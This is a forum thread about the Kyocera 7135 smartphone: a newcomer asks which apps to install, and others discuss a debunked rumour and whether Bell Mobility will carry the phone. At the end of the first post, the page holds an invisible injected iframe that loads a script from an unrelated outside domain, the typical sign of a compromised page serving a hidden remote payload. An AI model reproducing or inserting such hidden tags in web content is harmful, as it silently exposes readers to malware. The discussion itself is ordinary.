+ Reply to Thread

7135 Essentials for a newbie

I am going to get this in march sometime, I work for a Canadian based carrier who will be the only one to my knowledge carrying this beauty.

Question is, (and fyi am new to palms) what should I be looking to install on the unit/setup configure as the essentials to get the most out of this phone. Nothing to compliated at first, just tools/utilities etc that will help me. I plan on using it to become more orginized in general.

Thanks in advance all.

Dreaderus

EDIT: also is the 7135 really out dated now? have heard posts about people saying "kycercra is done with the 7135" is this true?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: 7135 Essentials for a newbie

Originally posted by dreaderus

EDIT: also is the 7135 really out dated now? have heard posts about people saying "kycercra is done with the 7135" is this true? [/B]

:biglaughb

Thanks for the laugh,

Signed,

A Sprint User

also is the 7135 really out dated now? have heard posts about people saying "kycercra is done with the 7135" is this true?
    Oh, my G-d! You're kidding, right?

My question remains.......... "outdated" compared to what???

Try starting out with this thread... What apps do I need for my 7135?
    Please visit my picture site: Robert-O-Rama :)

The Dawn of SmartPhones Tony_ensemble's Avatar
    also is the 7135 really out dated now?
    I'm not a 7135 fan (too big for my taste) yet I'd confidently say that its the most feature rich smartphone available today.

Originally posted by Tony_ensemble
    I'm not a 7135 fan (too big for my taste) yet I'd confidently say that its the most feature rich smartphone available today.
    This is just my unbiased opinion... but I would have to agree
    Please visit my picture site: Robert-O-Rama :)

which canadian carrier?

I've been waiting a long time for a Canadian Carrier to offer this phone. Which carrier is it? Any ETA?

Originally posted by Robert K.
    This is just my unbiased opinion... but I would have to agree
    I would also have to agree to this 100%

Oh got to go, someone is calling me on my 7135!

Re: which canadian carrier?

Originally posted by Ivan
    I've been waiting a long time for a Canadian Carrier to offer this phone. Which carrier is it? Any ETA?

Bell Mobility

Guys someone on this board posted that I read it, and edited into my post, its not out of my mouth its from someone on here stating that kyercera is now "done with the 7135" and is now working on a new one 8130? or something.

Dreaderus

Canadian Carrier

I just called Bell cellular, re: availablity of the 7135. The first guy said "Ahh, ummm, I don't know". I said thanks, hung up and called right back. This guy said in 1 - 2 months they would have it. Yeehaw. I'm sure the price tag will not be pretty!

Guys someone on this board posted that I read it, and edited into my post, its not out of my mouth its from someone on here stating that kyercera is now "done with the 7135" and is now working on a new one 8130? or something.

Dreaderus
    It has been repeatedly debunked. It was just a troll on another board, and it has now been copied and quoted dozens of times now.

Alan

I am going to get this in march sometime, I work for a Canadian based carrier who will be the only one to my knowledge carrying this beauty.

Question is, (and fyi am new to palms) what should I be looking to install on the unit/setup configure as the essentials to get the most out of this phone. Nothing to compliated at first, just tools/utilities etc that will help me. I plan on using it to become more orginized in general.

Thanks in advance all.

Dreaderus

EDIT: also is the 7135 really out dated now? have heard posts about people saying "kycercra is done with the 7135" is this true?
    get a spell checker for that thing

hmm

Well i apologize sir if you require me to spellcheck my work typing a quick reply here for some help. I use english as a 2nd language and it seemed you were the only one who did not grasp the meaning of my post.

FYI: Bell should have this phone by end of march.

Regards

Dreaderus